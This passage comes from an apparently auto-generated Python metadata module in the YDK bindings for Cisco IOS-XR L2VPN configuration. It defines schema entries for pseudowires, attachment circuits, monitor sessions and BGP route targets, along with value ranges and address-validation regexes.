[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
False,
[
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('neighbor', REFERENCE_LIST, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
[], [],
''' keys: neighbor
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-address', REFERENCE_LIST, 'PseudowireAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
[], [],
''' keys: pseudowire-address
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
False,
[
_MetaInfoClassMember('pseudowire', REFERENCE_LIST, 'Pseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
[], [],
''' Pseudowire configuration
''',
'pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Name of the monitor session
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable monitor session segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-session',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
False,
[
_MetaInfoClassMember('monitor-session', REFERENCE_LIST, 'MonitorSession' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
[], [],
''' Monitor session segment
''',
'monitor_session',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-sessions',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target Global ID
''',
'global_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('prefix', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Target Prefix
''',
'prefix',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('sacid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Source AC ID
''',
'sacid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routed',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
False,
[
_MetaInfoClassMember('pseudowire-routed', REFERENCE_LIST, 'PseudowireRouted' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
[], [],
''' Pseudowire configuration
''',
'pseudowire_routed',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routeds',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable attachment circuit interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
False,
[
_MetaInfoClassMember('attachment-circuit', REFERENCE_LIST, 'AttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 38)], [],
''' Name of the point to point xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attachment-circuits', REFERENCE_CLASS, 'AttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-attachment-circuits', REFERENCE_CLASS, 'BackupAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
[], [],
''' List of backup attachment circuits
''',
'backup_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('monitor-sessions', REFERENCE_CLASS, 'MonitorSessions' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
[], [],
''' List of Monitor session segments
''',
'monitor_sessions',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' cross connect description Name
''',
'p2p_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-evpns', REFERENCE_CLASS, 'PseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-routeds', REFERENCE_CLASS, 'PseudowireRouteds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
[], [],
''' List of pseudowire-routed
''',
'pseudowire_routeds',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowires', REFERENCE_CLASS, 'Pseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
[], [],
''' List of pseudowires
''',
'pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
False,
[
_MetaInfoClassMember('p2p-xconnect', REFERENCE_LIST, 'P2PXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
[], [],
''' Point to point xconnect
''',
'p2p_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router distinguisher type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('import', ATTRIBUTE, 'str' , None, None,
[], [],
''' Import route policy
''',
'import_',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
False,
[
_MetaInfoClassMember('mp2mp-route-target', REFERENCE_LIST, 'Mp2MpRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
[], [],
''' Name of the Route Target
''',
'mp2mp_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Remote Customer Edge Identifier
''',
'remote_ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
False,
[
_MetaInfoClassMember('remote-ceid-attachment-circuit', REFERENCE_LIST, 'RemoteCeidAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
[], [],
''' AC And Remote Customer Edge Identifier
''',
'remote_ceid_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
False,
[
_MetaInfoClassMember('ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Customer Edge Identifier
''',
'ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ceid-attachment-circuits', REFERENCE_CLASS, 'RemoteCeidAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
[], [],
''' AC And Remote Customer Edge Identifier
Table
''',
'remote_ceid_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
False,
[
_MetaInfoClassMember('ceid', REFERENCE_LIST, 'Ceid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
[], [],
''' Local Customer Edge Identifier
''',
'ceid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceids',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol' : {
